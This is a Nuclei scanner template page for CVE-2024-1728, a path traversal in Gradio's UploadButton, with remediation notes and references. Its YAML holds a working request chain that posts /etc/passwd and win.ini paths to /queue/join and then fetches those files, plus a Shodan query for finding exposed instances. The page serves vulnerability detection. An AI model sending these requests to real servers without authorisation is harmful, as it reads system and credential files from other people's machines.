Skip to content
Nuclei Templates

Gradio > 4.19.1 UploadButton - Path Traversal

ID: CVE-2024-1728

Severity: high

Author: isacaya

Tags: cve,cve2024,lfi,gradio,intrusive

Description

Section titled “Description”

gradio-app/gradio is vulnerable to a local file inclusion vulnerability due to improper validation of user-supplied input in the UploadButton component.

YAML Source

Section titled “YAML Source”
id: CVE-2024-1728


info:
  name: Gradio > 4.19.1 UploadButton - Path Traversal
  author: isacaya
  severity: high
  description: |
    gradio-app/gradio is vulnerable to a local file inclusion vulnerability due to improper validation of user-supplied input in the UploadButton component.
  impact: |
    Attackers can exploit this vulnerability to read arbitrary files on the filesystem, such as private SSH keys, by manipulating the file path in the request to the `/queue/join` endpoint. This issue could potentially lead to remote code execution. The vulnerability is present in the handling of file upload paths, allowing attackers to redirect file uploads to unintended locations on the server.
  remediation: |
    Update to version 4.19.2.
  reference:
    - https://github.com/gradio-app/gradio/commit/16fbe9cd0cffa9f2a824a0165beb43446114eec7
    - https://huntr.com/bounties/9bb33b71-7995-425d-91cc-2c2a2f2a068a
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1728
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-1728
    cwe-id: CWE-22
    epss-score: 0.00044
    epss-percentile: 0.10164
  metadata:
    max-request: 5
    verified: true
    vendor: gradio
    product: gradio
    shodan-query: html:"__gradio_mode__"
  tags: cve,cve2024,lfi,gradio,intrusive


http:
  - raw:
      - |
        POST /queue/join HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {"data":[{"path":"{{path}}","url":"{{BaseURL}}/file=/help","orig_name":"CHANGELOG.md","size":3549,"mime_type":"text/markdown"}],"event_data":null,"fn_index":0,"trigger_id":2,"session_hash":"{{randstr}}"}
      - |
        GET /queue/data?session_hash={{randstr}} HTTP/1.1
        Host: {{Hostname}}


      - |
        GET /file={{extracted_path}} HTTP/1.1
        Host: {{Hostname}}


    extractors:
      - type: regex
        name: extracted_path
        regex:
          - "/tmp/gradio/[^/]+/passwd"
          - "C:.*\\win\\.ini"
        internal: true


    payloads:
      path:
        - /etc/passwd
        - /windows/win.ini


    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[^:]:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or


      - type: status
        status:
          - 200
# digest: 4a0a004730450220648b8706a2532f63747fc0888f28bed9a14fccff12d336d6e69e99085e26d4420221009a091430ecdc95dddadfc4a8fc8772cce883992f154714275768d97aa7fd8151:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-1728.yaml"

View on Github